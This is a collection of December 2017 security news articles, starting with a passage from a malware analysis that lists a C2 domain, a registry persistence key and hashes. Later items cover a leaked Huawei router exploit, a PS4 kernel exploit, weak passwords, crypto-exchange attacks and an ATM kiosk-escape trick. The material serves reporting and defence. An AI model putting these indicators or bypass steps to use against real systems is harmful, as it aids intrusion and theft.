Stage 2: Apparently Japanese characters
While the sample pretends to be compiled from “Coca-Cola Enterprise” (maybe a target operation against Coca-Cola ? Or a targeted operation agains Coca-Cola Suppliers ? So why it ended up to my inbox ? Anyway … ) google translator suggests me that Japanese characters are in text: such as the “Entry Point”, “Class names” and “Function Names”.
Info%20Stealing
Stage 2: Japanese Names and Self Encoding Structures
It was not hard to figure out that Stage 2 was auto-extracting bytes from itself (local variables) and saving them back to hard drive after having set up auto execution registry key on windows local registry. The following image shows the xoring function used to decrypt converted bytes to the real payload.
Info%20Stealing
Stage 2: Xoring function to extract Stage 3
On my run, the xored payload took the name of GIL.exe; another .NET executable. We are now facing the third stage. By analyzing the decompiled sample it became clear that:

The coding style was quite different from the previous stage (Stage 2)
The implementation style was different from the previous stage as well
The sample was interested in information about the user, the machine, the web services on the PC and to many more windows specific parameters.
Info%20Stealing
Stage 3: New Language in Strings and Class names

Info%20Stealing
Stage 3: New Code Style
By closely investigating Stage 3, the analyst would probably notice the heavy presence of “decorators”, a different format in the definition style and last but not least the core composition. Everything looks like belonging to different single developers. The variable language, the comments structure and the general usage of terms, takes the analyst to believe in having found two different developers belonging to different cultures (maybe countries). Finally the malware looks for users, computes, and web services informations and drops everything up to C2 by posting parameters to : ssrdevelopments.co.za/cgi-bin/
IoC:
Following the principal IoC for the described threat.
Hash Stage 1:
7f1860673de9b1c2e6f7d6963a499e8ba4e412a1
bf4a26c9e52a8cacc7afd7d95d197bff1e47fb00
Hash Stage 2:
ac55ee783f3ed0bd23eccd01040a128dc6dc7851
Hash Stage 3:
6a38e4acd9ade0d85697d10683ec84fa0daed11c
Persistence: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\kij %APPDATA%\Roaming\kij\kij.exe
Dropping URL:
ssrdevelopments.co.za
Command and Control:
ssrdevelopments.co.za/cgi-bin/
Related hashes from harvesting Dropping URL:
62c9d2ae7bafa9c594230c570b66ec2d4fa674a6
b15b69170994918621ceb33cb339149bdff5b065
55abcfb85e664fbc8ad1cb8b60a08409c2d26caa
f843427e9b7890f056eaa9909a5103bba6ffb8fd
f2b81e66fcb1032238415b83b75b3fe8bf28247d
cab90f7c935d355172b0db123d20b6a7d1403f65
c1ba30d7adec6d545d5274f95943f787ad4c03e7
ed9959bb0087f2c985b603cee0e760f3e0faaab15
c93851627ffd996443f85d916f3dbedd70e0ff69
144b34b4816062c2308a755273159e0460ffd604
98293b80ccf312a8da99c2b5ca36656adebd0d0f
2875d1b54337b1c17c8f4cd5f6b2d579667ee3d9
0b4299ffb3f9aa59e19dd726e79d95365fe1d461
46bb0b10d790a3f21867308e7dcdeb06784a1570
0960726560a94fbbb327aa84244f9588a3c68be8
a480a75c3af576e5656abadb47d11515a18a82be
2ba809c53eda2a475b1353c34f87ce62b6496e16
5b0c3071aa63e18aa91af59083223d3cceb0fa3c
dc780bf338053e9c1b0fdf259c831eb8a2768169
As final thought I’d like to highlight the following key concept of that analysis:

From a single email, the analyst could discover attacker’s assets, mapping them and disarming them (through IoC).
The analyzed code shows apparent evidences to belonging to different groups of attackers.
The analyzed samples show code reuse. Code reuse is dangerous because it makes attackers more powerful and extremely quick to change Malware behavior.
Hope you enjoyed.

The original post published by Marco Ramilli on his blog at the following URL:

https://marcoramilli.blogspot.it/2017/12/info-stealing-new-operation-in-wild.html


Huawei router exploit (CVE-2017-17215) involved in Satori and Brickerbot was leaked online
30.12.2017 securityaffairs
Exploit

The exploit code used to trigger the CVE-2017-17215 vulnerability in Huawei routers over the past several weeks is now publicly available.
Before Christmas, the Mirai botnet made the headlines once again, a new variant dubbed Satori was responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

The activity of the Satori botnet has been observed over the past month by researchers from Check Point security.

Satori is an updated variant of the notorious Mirai botnet that was first spotted by the malware researchers MalwareMustDie in August 2016. The malicious code was developed to target IoT devices, the Satori version targets port 37215 on Huawei HG532 devices.

The attacks against Huawei HG532 devices were observed in several countries, including the USA, Italy, Germany, and Egypt.

CVE-2017-17215%20exploit%20satori

Experts observed that attacks attempt to exploit the CVE-2017-17215 zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

News of the day is that the code used to target the Huawei routers over the past several weeks is now publicly available.

The discovery was made by Ankit Anubhav, a researcher at security firm NewSky.

Anubhav first discovered the code on Pastebin.com early this week.

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” states a blog post published by Anubhav.

The exploit code for the CVE- 2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).

The availability of the code online represents a serious risk, it could become a commodity in the criminal underground, vxers could use it to build their botnet.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code, earlier in December, the author of the Brickerbot botnet that goes online with the moniker “Janitor” released a dump which contained snippets of Brickerbot source code.

NewSky Security analyzing the code discovered the usage of the exploit code CVE-2017–17215, this means that the code was available in the underground for a long.

“Let us compare this with a binary of Satori botnet (in the image below). Not only we see the same attack vector i.e. code injection in <NewStatusURL>, but also, we witness the other indicator “echo HUAWEIUPNP“ string, implying that both Satori and Brickerbot had copied the exploit source code from the same source.” continues NewSky.

CVE-2017-17215

This is not the first time that IoT botnets leverage issues related to the SOAP protocol. Earlier this year, security experts observed several Mirai-based botnets using two other SOAP bugs (CVE-2014–8361 and TR-64) which are code injections in <NewInternalClient> and <NewNTPServer> respectively.

Back to the present, Huawei provided a list of mitigation actions for this last wave of attacks that includes configuring a router’s built-in firewall, changing the default password or using a firewall at the carrier side.

I avoided to provide the link to the code published on Pastebin, but it is very easy to find it with the proper query.


China Has Shut Down 13,000 Websites Since 2015: Xinhua
30.12.2017 securityweek BigBrothers
China has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country's internet rules, state media reported Sunday.

The news comes as the Communist country continues to strengthen its already tight regulation of the internet, a move which critics say has picked up pace since President Xi Jinping came to power in 2012.

Platforms have also closed nearly 10 million internet accounts for "violating service protocol", the official news agency said Sunday, likely referring to social media accounts.

"These moves have a powerful deterrent effect," Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People's Congress (NPC), as saying.

Despite being home to the world's largest number of internet users, a 2015 report by US think tank Freedom House found that the country had the most restrictive online use policies of 65 nations it studied, ranking below Iran and Syria.

This year alone, it has enacted new rules requiring foreign tech companies to store user data inside the country, imposed fresh content restrictions, and made it increasingly difficult to use software tools that allow users to circumvent censors.

Google, Facebook, Twitter and The New York Times are all blocked in China, among countless other foreign websites.

Beijing strictly defends what it calls "cyber sovereignty" and maintains that its various forms of web censorship -- collectively known as "The Great Firewall" -- are necessary for protecting its national security.

Within China, websites must register with authorities and are responsible for "ensuring the legality of any information" posted on their platforms, according to regulations in force since 2000.

When their content runs afoul of authorities, they can be shutdown or fined.

One way to bypass the strictly controlled domestic internet is by using a virtual private network (VPN) which can allow users to access the unfiltered global internet. But here too authorities have cracked down.

Earlier this week, Wu Xiangyang from the southern Guangxi Zhuang autonomous region was sentenced to five and a half years in prison for selling a VPN service on Alibaba's Taobao and other marketplaces.


Two Romanians Charged With Hacking US Capital Police Cameras
30.12.2017 securityweek Crime
Two Romanian nationals have been arrested and charged with hacking into computer systems which controlled surveillance cameras for the Metropolitan Police Department in the US capital earlier this year, officials said Thursday.

A criminal complaint unsealed in Washington said the two -- Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28 -- were arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.

The Justice Department said the pair managed to disable 123 of the police department's 187 outdoor surveillance cameras in early January by infecting computer systems with ransomware -- an effort "to extort money" in exchange for unlocking the computer, according to an affidavit filed in court.

The case "was of the highest priority" because it impacted efforts to plan security ahead of the 2017 presidential inauguration, according to officials.

The Secret Service and other agencies "quickly ensured that the surveillance camera system was secure and operational" and the investigation found no security threats as a result of the scheme.

Isvanca remains in custody in Romania and Cismaru is on house arrest there pending further legal proceedings, the Justice Department said.


2018 Cyber Security Predictions

28.12.2017 Symantec Cyber
As 2017 draws to a close, here is what you can expect over the course of the upcoming year
This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

Gear up for a busy year ahead. Incidents like the WannaCry attack, which impacted more than 200,000 computers worldwide in May, are just the warmup to a new year of more virulent malware and DDoS attacks. Meanwhile, cyber criminals are poised to step up their attacks on the millions of devices now connected to the Internet of Things both in offices and homes.

As 2017 draws to a close, here is what you can expect over the course of the upcoming year:

Blockchain Will Find Uses Outside Of Cryptocurrencies, But Cyber criminals Will Focus On Coins and Exchanges

Blockchain is finally finding applications outside of crypto-currencies, expanding to inter-bank settlements, fuelled by increasing traction in IoT. However, these use cases are still in their infancy and are not the focus for most cyber criminals today. Instead of attacking Blockchain technology itself, cyber criminals will focus on compromising coin-exchanges and users’ coin-wallets since these are the easiest targets, and provide high returns. Victims will also be tricked into installing coin-miners on their computers and mobile devices, handing their CPU and electricity over to cyber criminals.

Cyber Criminals Will Use Artificial Intelligence (AI) & Machine Learning (ML) To Conduct Attacks

No cyber security conversation today is complete without a discussion about AI and ML. So far, these conversations have been focused on using these technologies as protection and detection mechanisms. However, this will change in the next year with AI and ML being used by cyber criminals to conduct attacks. It is the first year where we will see AI versus AI in a cybersecurity context. Cyber criminals will use AI to attack and explore victims’ networks, which is typically the most labour-intensive part of compromise after an incursion.

Supply Chain Attacks Will Become Mainstream

Supply chain attacks have been a mainstay of classical espionage and signals-intelligence operators, compromising upstream contractors, systems, companies and suppliers. They are highly effective, with nation-state actors using human intelligence to compromise the weakest links in the chain, as well as malware implants at the manufacture or distribution stage through compromise or coercion.

These attacks are now moving into the mainstream of cyber crime. With publicly available information on technology, suppliers, contractors, partnerships and key personnel, cyber criminals can find and attack weak links in the supply chain. With a number of high-profile, successful attacks in 2016 and 2017, cyber criminals will focus on this method in 2018.

This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

File-less and File-light Malware Will Explode

2016 and 2017 have seen consistent growth in the amount of file-less and file-light malware, with attackers exploiting organizations that lack in preparation against such threats. With fewer Indicators of Compromise (IoC), use of the victims’ own tools, and complex disjointed behaviours, these threats have been harder to stop, track and defend against in many scenarios. Like the early days of ransomware, where early success by a few cyber criminals triggered a gold-rush like mentality, more cyber criminals are now rushing to use these same techniques. Although file-less and file-light malware will still be smaller by orders-of-magnitude compared to traditional-style malware, they will pose a significant threat and lead to an explosion in 2018.

Organisations Will Still Struggle With Security-as-a-Service (SaaS) Security

Adoption of SaaS continues to grow at an exponential rate as organizations embark on digital transformation projects to drive business agility. This rate of change and adoption present many security challenges as access control, data control, user behaviour and data encryption vary significantly between SaaS apps. While this is not new and many of the security problems are well understood, organizations will continue to struggle with all these in 2018.

Combined with new privacy and data protections laws going into effect globally, these will pose major implications in terms of penalties, and more importantly, reputational damage.

Organisations Will Still Struggle With Infrastructure-as-a-Service (IaaS) Security – More Breaches Due to Error, Compromise & Design

IaaS has completely changed the way organisations run their operations, offering massive benefits in agility, scalability, innovation and security. It also introduces significant risks, with simple errors that can expose massive amount of data and take down entire systems. While security controls above the IaaS layer are a customer’s responsibility, traditional controls do not map well to these new cloud-based environments – leading to confusion, errors and design issues with ineffective or inappropriate controls being applied, while new controls are ignored. This will lead to more breaches throughout 2018 as organizations struggle to shift their security programs to be IaaS effective.

Financial Trojans Will Still Account For More Losses Than Ransomware

Financial Trojans were some of the first pieces of malware to be monetised by cyber criminals. From simple beginnings as credential-harvesting tools, they have since evolved to advanced attack frameworks that target multiple banks, and banking systems, sending shadow transactions and hide their tracks. They have proven to be highly profitable for cyber criminals. The move to mobile, application-based banking has curtailed some of the effectiveness, but cyber criminals are quickly moving their attacks to these platforms. Cyber criminals’ profits from Financial Trojans is expected to grow, giving them higher gains as compared to Ransomware attacks.

Expensive Home Devices Will Be Held To Ransom

Ransomware has become a major problem and is one of the scourges of the modern Internet, allowing cyber criminals to reap huge profits by locking up users’ files and systems. The gold-rush mentality has not only pushed more and more cyber criminals to distribute ransomware, but also contributed to the rise of Ransomware-As-A-Service and other specializations in the cyber criminal underworld. These specialists are now looking to expand their attack reach by exploiting the massive increase in expensive connected home devices. Users are generally not aware of the threats to Smart TVs, smart toys and other smart appliances, making them an attractive target for cyber criminals.

IoT Devices Will Be Hijacked and Used in DDoS Attacks

In 2017, we have seen massive DDoS attacks using hundreds of thousands of compromised IoT devices in people’s homes and workplaces to generate traffic. This is not expected to change with cyber criminals looking to exploit the poor security settings and lax personal management of home IoT devices. Furthermore, the inputs and sensors of these devices will also be hijacked, with attackers feeding audio, video or other faked inputs to make these devices do what they want rather than what users expect them to do.

IoT Devices Will Provide Persistent Access to Home Networks

Beyond DDoS attacks and ransomware, home IoT devices will be compromised by cyber criminals to provide persistent access to a victim’s network. Home users generally do not consider the cyber security implications of their home IoT devices, leaving default settings and not vigilantly updating them like they do with their computers. Persistent access means that no matter how many times a victim cleans their machine or protects their computer, the attacker will always have a backdoor into victims’ network and the systems that they connect to.

Attackers Exploit The Move To DevOps

The agile, DevOps and DevSecOps movements are transforming IT and cyber-security operations in every organisation. With improved speed, greater efficiencies and more responsive delivery of IT services, this is quickly becoming the new normal. While all this works to the greater good, like any disruptive change, it offers opportunities not only for errors, but also for attackers to exploit. Much like the issues facing the move to SaaS and IaaS, organizations are struggling to apply security controls in these new models of CI/CD and automation. As environments change constantly, anomaly detection gets harder, with many existing systems creating far too many false positives to be effectively dealt with. In the next year, we’ll see a greater number of attackers taking advantage of this to cover their activities inside a victim’s environment.

Cryptowars Redux Enters Its Second Phase

The cryptowars were fought and won in the 1990s, or so everyone thought. Over the last two years, however, the struggle has re-emerged with governments, policy makers, law enforcement, technology companies, telcos, advertisers, content providers, privacy bodies, human rights organisations and pretty much everyone expressing different opinions on how encryption should be used, broken, circumvented or applied. The war will continue to be fought on a mostly privacy versus government surveillance basis, particularly for device and communications (email and messaging) encryption. Beyond that, though, expect to see content providers, telcos and advertisers influencing much of the adoption of transport layer encryption, as it’s often viewed as being at odds with their business models.


Kernel Exploit for Sony PS4 Firmware 4.05 Released, Jailbreak Coming Soon
27.12.2017 thehackernews
Exploit

Wishing you all a very 'belated' Merry Christmas. This holiday season Santa has a very special gift for all PlayStation gamers.
Developer SpecterDev finally released a fully-functional much-awaited kernel exploit for PlayStation 4 (firmware 4.05) today—almost two months after Team Fail0verflow revealed the technical details of it.
Now available on Github, dubbed "namedobj," the kernel exploit for the PlayStation 4 on 4.05FW allows users to run arbitrary code on the gaming console, enabling jailbreaking and kernel-level modifications to the system.
Although PS4 kernel exploit does not include Jailbreak code, others can develop a full jailbreak exploit using it.
Jailbreaking allows users to run custom code on the console and install mods, cheats, third-party applications, and games that are typically not possible because of the anti-piracy mechanisms implicated on the Sony PlayStation.
"This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew," SpecterDev said.
"This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival."
It should be noted that for some users it may not work as smooth as it sounds.
"This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads," SpecterDev warned.
PS4 gamers who are running firmware version lower than 4.05 can simply update their console to take advantage of this exploit.
Of course, Sony would not be happy with the launch of PlayStation 4 kernel exploit and would be trying hard to eliminate any vulnerability for the most recent version of PS4 firmware.


For the second year in a row, “123456” was the top password found in data dumps in 2017
27.12.2017 securityaffairs  Hacking

For the second year in a row, “123456” was the top password found in data dumps in 2017 despite the numerous warning of using strong passwords.
For the second year in a row, “123456” was the top password among the millions of cleartext passwords exposed online due to the numerous data breaches suffered by organizations and private firms.

The list was published by researchers at SplashData who analyzed more than five million user records containing passwords that were leaked online in 2017.

“Use of any of the passwords on this list would put users at grave risk for identity theft,” said a SplashData spokesperson in a press release.

The list of Top 100 Worst Passwords of 2017 is embarrassing, it includes a huge number of sports terms (football, baseball, soccer, hockey, Lakers, jordan23, golfer, Rangers, Yankees) and car brands (Corvette, Ferrari, Harley, Mercedes).

Users continue to use common names as their passwords, names like of Robert (#31), Matthew (#32), Jordan (#33), Daniel (#35) and many others continue to be widely used.

top%20password

Top passwords are the basic components of lists used by hackers in brute force attacks based on dictionaries. Attackers will use the Top password list also to create common variations on these words using simple algorithms, for example by adding a digit or any other character combinations at the start or end of words.

Despite the numerous report published by the experts, users continue to adopt weak passwords and tend to reuse them to access several web services.

Let me close the post with the list of the Top 10 passwords extracted from the SplashData report.

1 – 123456 (rank unchanged since 2016 list)
2 – password (unchanged)
3 – 12345678 (up 1)
4 – qwerty (Up 2)
5 – 12345 (Down 2)
6 – 123456789 (New)
7 – letmein (New)
8 – 1234567 (Unchanged)
9 – football (Down 4)
10 – iloveyou (New)


The popular cryptocurrency exchange EtherDelta suffered a DNS attack
27.12.2017 securityaffairs  Hacking

The popular cryptocurrency exchange EtherDelta was hacked, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789) as well as a large number of tokens.
The spike in cryptocurrency values is attracting cybercriminals, the last victim is the popular cryptocurrency exchange EtherDelta that announced a potential attack against its DNS server.
As result of the attack, the exchange suspended its service, below the tweet sent by the company that confirms that its server was hacked by attackers.


EtherDelta
@etherdelta
Dear users, we have reason to believe that there had been malicious attacks that temporarily gained access to @etherdelta http://EtherDelta.com DNS server. We are investigating this issue right now - in the meantime please DONOT use the current site.

9:34 PM - Dec 20, 2017
81 81 Replies 536 536 Retweets 359 359 likes
Twitter Ads info and privacy
The attackers spoofed EtherDelta’s domain to trick users into sending money.

“At least 308 ETH ($266,789) were stolen, as well as a large number of tokens potentially worth hundreds of thousands of dollars.” reported Mashable.

EtherDelta posted another tweet to warn its users and explain that the impostor’s app had no chat button on the navigation bar, nor did it have an official Twitter feed on the bottom right. EtherDelta advised all users not to use the site.


EtherDelta
@etherdelta
⚠️ 2/2 *BE AWARE* The imposer's app has no CHAT button on the navigation bar nor the offical Twitter Feed on the bottom right. It is also populated with a fake order book.

9:48 PM - Dec 20, 2017
296 296 Replies 517 517 Retweets 410 410 likes
Twitter Ads info and privacy
On Dec. 22, the service was fully restored. The company clarified that users using the MetaMask or hardware wallet on EtherDelta were not affected by the attack, also users that had never imported their private key on the imposer’s phishing site are safe.

EtherDelta

Recently another cryptocurrency exchange, the South Korean Youbit has gone bankrupt after suffering a major cyber attack for the second time this year.

Earlies December, the cryptocurrency mining market NiceHash confirmed it has fallen victim to a hacking attack that resulted in the loss of $60m worth of Bitcoin.

The EtherDelta hack is emblematic, even if EtherDelta is supposed to be decentralized the attack against its website caused serious problems to the company operations.


Mozilla patches five issues in Thunderbird, including a critical flaw
27.12.2017 securityaffairs
Vulnerebility

Mozilla issued a critical security update to address five flaws in the popular open-source Thunderbird email client.
The latest release, Thunderbird 52.5.2 version, fixes the vulnerabilities, including two issues rated as high, one rated moderate and another low.

The most severe flaw fixed with the Thunderbird 52.5.2 version is a critical buffer overflow vulnerability (tracked as CVE-2017-7845) that affects Thunderbird running on the Windows operating system.

“A buffer overflow occurs when drawing and validating elements using Direct 3D 9 with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash.” reads the security advisory published by the Mozilla Foundation.

The two security vulnerabilities rated as high were CVE-2017-7846 and CVE-2017-7847. The first one (CVE-2017-7846) affects the Thunderbird’s RSS reader.

“It is possible to execute JavaScript in the parsed RSS feed when RSS feed is viewed as a website, e.g. via “View -> Feed article -> Website” or in the standard format of “View -> Feed article -> default format” reads the advisory.

The second high-severity issue tracked as CVE-2017-7847 also affect the RSS reader.

“Crafted CSS in an RSS feed can leak and reveal local path strings, which may contain user name.” states the advisory.

Thunderbird

The moderate issue tracked as CVE-2017-7848 also affects the RSS feed, while low issue tracked as CVE-2017-7829 impacts email.

“It is possible to spoof the sender’s email address and display an arbitrary sender address to the email recipient. The real sender’s address is not displayed if preceded by a null character in the display string.” reads Mozilla’s advisory.


The spike in Bitcoin price is making it a less useful payment method in the cybercrime underground
27.12.2017 securityaffairs CyberCrime

The recent spike in the Bitcoin price and the fees associated with each transaction are making Bitcoin a less useful payment method in the cybercrime underground.
We have a long debated the use of unregulated virtual currencies like Bitcoin in the criminal underground. Virtual currencies have a crucial role in facilitating illicit commerce, it is normal that their fluctuation could have a significant impact on the criminal ecosystem. The recent spike in the price of Bitcoin and the fees associated with each transaction are making Bitcoin a less useful payment method in the cybercrime underground.

Originally, one of the points of strength for Bitcoin was that payments would be fast, cheap, and convenient. This was true until the beginning of this year when Bitcoin fees were often less than $0.10.

Bitcoin price spike

The spike in the Bitcoin value and related fees per transaction has made Bitcoin far less attractive for conducting small-dollar transactions that represent the vast majority of payments in the criminal underground.

“As a result, several major underground markets that traffic in stolen digital goods are now urging customers to deposit funds in alternative virtual currencies, such as Litecoin. Those who continue to pay for these commodities in Bitcoin not only face far higher fees, but also are held to higher minimum deposit amounts.” wrote the popular investigator and security blogger Brian Krebs.

Krebs cited as an example the case of the black marketplace “Carder’s Paradise” that he recently analyzed, well its administrators admitted difficulties due to the spike in the value of Bitcoin.

Krebs explained that the current minimum deposit amount on Carder’s Paradise is 0.0066 BTCs (roughly USD $100). The deposit fee for each transaction is $15.14, this means that every time a user of the black market deposits the minimum amount into this shop is losing approximately 15 percent his deposit in transaction fees.

“The problem is that we send all your deposited funds to our suppliers which attracts an additional Bitcoin transaction fee (the same fee you pay when you make a deposit),” Carder’s Paradise explains. “Sometimes we have to pay as much as 5$ from every 1$ you deposited.”

“We have to take additionally a ‘Deposit fee’ from all users who deposit in Bitcoins. This is the amount we spent on transferring your funds to our suppliers. To compensate your costs, we are going to reduce our prices, including credit cards for all users and offer you the better bitcoin exchange rate.”

“The amount of the Deposit Fee depends on the load on the Bitcoin network. However, it stays the same regardless of the amount deposited. Deposits of 10$ and 1000$ attract the same deposit fee.”

“If the Bitcoin price continues increasing, this business is not going to be profitable for us anymore because all our revenue is going to be spent on the Bitcoin fees. We are no longer in possession of additional funds to improve the store.”

“We urge you to start using Litecoin as much as possible. Litecoin is a very fast and cheap way of depositing funds into the store. We are not going to charge any additional fees if you deposit Litecoins.”

In the case of the Carder’s Paradise, the huge volume of transactions allowed the administrators to lower the price of stolen credit cards to compensate the increase of the transaction fees, but it is an exceptional scenario.

“Our team made a decision to adjust the previous announcement and provide a fair solution for everyone by reducing the credit cards [sic] prices,” the message concludes.

Transaction fees are too high and operators of black marketplaces could be forced to refuse payments in Bitcoin.


Three fake Bitcoin wallet apps were removed from the official Google Play
27.12.2017 securityaffairs Android

Researchers from the mobile security firm Lookout have discovered three fake Bitcoin wallet apps in the official Play store, Google promptly removed them.
Experts from mobile security firm Lookout have discovered three fake Bitcoin wallet apps in the official Play store. The fake Bitcoin wallet apps were removed by Google Play after security researchers reported their discovery to the tech giant.

The spike in Bitcoin prices is attracting crooks as never before, the number of attacks involving the cryptocurrency continues to increase.

The three fake applications tracked as PickBitPocket were developed to provide the attacker’s Bitcoin address instead of the seller’s one. The fake apps accounted for a total of up to 20,000 downloads before Google removed them from the Play store.

“Lookout has identified three Android apps disguised as bitcoin wallet apps, previously in the Google Play Store, that trick victims into sending bitcoin payments to attacker-specified bitcoin addresses.” reads the analysis published by Lookout.

“Google removed the apps immediately after Lookout notified the company. The apps collectively had up to 20,000 downloads at time of removal.”

The researchers explained that when users that installed the fake apps attempt to buy goods or services their payments are hijacked to the attacker’s wallet.

The three fake Bitcoin wallet apps discovered by Lookout are:

Bitcoin mining, which had between 1,000 and 5,000 installs at the time it was removed;
Blockchain Bitcoin Wallet – Fingerprint, which had between 5,000 and 10,000 installs;
Fast Bitcoin Wallet, which has between 1,000 and 5,000 installs.
fake%20bitcoin%20wallet%20apps

“As Bitcoin captures broader interest, this means more people may be purchasing the cryptocurrency, or looking for mobile wallets to store their coins. Individuals should be vigilant in choosing a secure wallet and should also have a security solution in place to identify malicious activity on their device,” concluded Lookout.


ATMs operated by a Russian Bank could be hacked by pressing five times the ‘Shift’ key
27.12.2017 securityaffairs Hacking

ATMs operated by the Sberbank bank running Windows XP are affected by easily exploitable security vulnerabilities, they could be hacked by pressing five times the ‘Shift’ key.
We have warned several times of risks for ATM running outdated Windows XP operating system. These systems could be easily hacked as recently discovered by an employee of the Russian blogging platform Habrahabr who reported that the ATMs operated by the Sberbank bank running Windows XP are affected by easily exploitable security vulnerabilities.

The user discovered that a full-screen lock that prevents access to various components of an ATM operating system could be bypassed by pressing five times special keys like SHIFT, CTRL, ALT, and WINDOWS.

By pressing the SHIFT key five times it is possible to access the Windows settings and displaying the taskbar and Start menu of the operating system, with this trick users can have access to Windows XP by using the touchscreen.

“Well, I, standing at the terminal of the Savings Bank with a full-sized keyboard and waiting for the operator to answer the phone, decided to press this Shift from boredom, naively believing that without functional keys this would lead to nothing. No matter how it is! Five times quick pressing of this key gave me that very little window, besides revealing the task panel with all the bank software.” wrote the user.

“Stopping the work of the batch file (see the taskbar on the video below), and then all the banking software, you can break the terminal.”

This vulnerability allows hackers to modify ATM boot scripts and install malicious code on the machine.

The users tried to report the issue to the Sberbank contact center, but unfortunately, the operator was not able to help the man and suggested him to contact the support service using the phone number written on the terminal itself.

According to the German website WinFuture, Sberbank had been informed of the security flaw in its ATM almost two weeks ago. The bank confirmed to have immediately fixed the security issue, but the user who discovered the flaw claimed that the issue is still present on the terminal he visited.

“In tech support, a friendly girl after I said that I want to report a vulnerability, immediately switched me to some other specialist. He first asked how to contact me and the terminal number, then on the nature of the problem, then I listened to music for a long time, and, after all, the guy said that the problem is fixed. ” continues the user.

“All this happened on the sixth of December. Two weeks later I decided to check that there is a terminal. Still, after all, they said that they “fixed” the problem, probably they should have already eliminated it, but no – it’s still there, the window still pops up.”

Security experts urge financial institutions to update the latest version of Windows for their ATMs.


Eliminace hesel je běh na dlouhou trať

27.12.2017 SecurityWorld Zabezpečení
Odstranění hesel bude trvat roky, uznává oborová aliance FIDO. Podle jejích slov je však na dobré cestě k rychlejšímu, jednoduššímu a mnohem bezpečnějšímu standardu autentizace.

Aliance FIDO (dříve známá jako Fast Identity Online) má v úmyslu eliminovat hesla. Na první pohled to nevypadá jako těžký úkol. Mezi bezpečnostními experty probíhá diskuze, že hesla jsou dnes už špatným a zastaralým způsobem autentizace.

Důkazy jsou zdrcující. Většina lidí navzdory doporučením používat dlouhá a složitá hesla, měnit je alespoň jednou za měsíc a vyhnout se použití stejného hesla pro více webů tak nečiní.

Masivní úniky

Nedávná zpráva společnosti Verizon o únicích dat (Data Breach Incident Report) konstatuje, že 63 procent všech úniků dat bylo umožněno tím, že se použila ukradená, slabá anebo výchozí hesla.

I když mohou být hesla složitá, problémem je jejich potenciální ukradení. Jen v posledních měsících došlo k řadě oznámení o katastrofických únicích hesel – 33 milionů z Twitteru, 165 milionů z LinkedInu, 65 milionů z Tumbleru, 360 milionů z MySpace, 127 milionů z Badoo, 171 milionů z VK.com a další.

Nick Bilogorskly, šéf hrozeb ve společnosti Cyphort, nedávno uvedl, že nyní existuje více než miliarda účtů, jejichž přihlašovací údaje se prodávají on-line. Přirovnal je ke stovkám milionů klíčů schopných odemknout bankovní úschovné boxy jen tak ležící na zemi.

„Abyste otevřeli libovolný box, stačí ho zvednout a najít shodu,“ popisuje. „Ve skutečnosti je to horší, protože většina lidí používá stejný klíč k otevírání své kanceláře, auta i domu.“

Díky automatizaci je dnes možné vyzkoušet klíče pro miliony zámků řádově za sekundy. Podle studie výzkumníků z vysoké školy Dartmouth College, Pennsylvánské univerzity a USC je situace ve zdravotnictví ještě horší.

Tamější personál se totiž většinou snaží obcházet hesla, aby se zabránilo jakémukoli zpoždění při používání zařízení nebo přístupu k materiálu – hesla se běžně píší na lepicí papírky.

Podle zprávy zní otázka takto: Chceš mé heslo, nebo mrtvého pacienta? – zdravotnický personál se jen snaží dělat svou práci tváří v tvář často omezujícím a nepochopitelným pravidlům pro zabezpečení počítačů.

Eliminace hesel

Řešení pro takový děravý „bezpečnostní“ standard spočívá v tom, zbavit se ho, uvádí FIDO. Avšak aliance, která sama sebe popisuje jako konsorcium nezávislé na oboru, musí udělat více, než jen přesvědčit experty, či dokonce poskytovatele webového obsahu. Musí přesvědčit samotné uživatele – tedy ty, jež znají a používají hesla a kteří mohou projevovat iracionální odpor.

Neexistuje nic takového jako dokonalost. Vždy půjde o závody ve zbrojení. „Webové stránky, které se snaží být oblíbené, nemohou nutit své uživatele k ničemu,“ popisuje Gary McGraw, technologický ředitel společnosti Cigital.

„Twitter má dvoufaktorovou autentizaci (2FA) již nyní, ale nemusíte ji používat. Jen byste měli. Můžete jen pěkně poprosit – jinak je to ekonomický střet zájmů.

Vishal Gupta, výkonný ředitel společnosti Seclore, se domnívá, že masy přijmou jinou formu autentizace, pokud bude rychlejší a jednodušší, ale přesto si uvědomuje, že to není možné vynutit a že to bude dlouhá cesta.

„Je to velmi podobné jako rozdíl mezi platebními kartami s čipem i PIN a staršími verzemi, které měly jen magnetický proužek. Aby se to nahradilo, tak se na tom bude muset podílet hodně podniků,“ vysvětluje.

Samozřejmě dokonce i Brett McDowell, výkonný ředitel aliance souhlasí s tím, že „nutit poskytovatele webových služeb něco dělat je předem ztracené“. Řekl však, že FIDO s téměř 250 členskými organizacemi se nesnaží nic prosadit silou.

Cílem této skupiny je zajistit, aby to bylo neodolatelné – „dodat takové řešení, které budou poskytovatelé sami chtít implementovat, protože to bude v jejich vlastním zájmu,“ popisuje.

